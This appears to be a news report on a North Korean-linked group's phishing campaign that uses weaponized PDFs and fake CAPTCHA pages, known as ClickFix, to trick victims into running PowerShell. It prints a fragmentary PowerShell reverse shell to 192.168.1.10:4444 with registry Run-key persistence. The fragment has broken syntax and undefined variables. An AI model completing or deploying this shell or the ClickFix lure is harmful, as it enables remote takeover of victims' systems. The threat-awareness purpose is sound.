A North Korean-linked cyber espionage group known as Velvet Chollima has launched a targeted campaign against South Korean government officials. The group is using malicious PDF documents and advanced social engineering to compromise systems in South Korea and beyond.
The campaign, active since January 2025, targets a wide range of entities. These include NGOs, government agencies, and media organizations across North America, South America, Europe, and East Asia.
Spear-Phishing With Weaponized PDFs
Velvet Chollima’s attacks begin with spear-phishing emails. These messages contain PDF attachments that appear to come from trusted South Korean officials. The documents are designed to deceive recipients and establish initial contact with high-value targets.
Once the attackers gain the victim’s trust, they proceed to deliver malicious content. This method of slow engagement increases the chances of a successful attack.
Offensive Security Engineer Abdulrehman Ali identified the attack during an adversary simulation. His research was supported by threat intelligence from Microsoft.
Fake CAPTCHA and the ClickFix Technique
When victims open the PDFs, they are redirected to fake device registration pages. These pages use a tactic called ClickFix, which presents a bogus CAPTCHA to the user.
The CAPTCHA is not real. Instead, it tricks users into running dangerous PowerShell commands. These commands give attackers remote access and control over the victim’s system. Because users run the commands themselves, many security systems fail to detect the intrusion.
Infection and Persistence
The attack relies on a fake CAPTCHA interface that silently copies a PowerShell script to the user’s clipboard. If executed, the script opens a reverse shell to the attacker and modifies the Windows registry to maintain access even after reboot.
while ($true) {
try {
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
// Registry persistence
$regPath = "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
Set-ItemProperty -Path $regPath -Name $regName -Value $regValue
}This script allows the attackers to execute commands remotely and ensures the system remains compromised over time.
Conclusion
Velvet Chollima’s campaign marks a new level of sophistication in cyber attacks. By combining technical skill with psychological manipulation, the group has managed to bypass traditional defenses. Government agencies and organizations are advised to remain vigilant and educate staff on phishing threats.
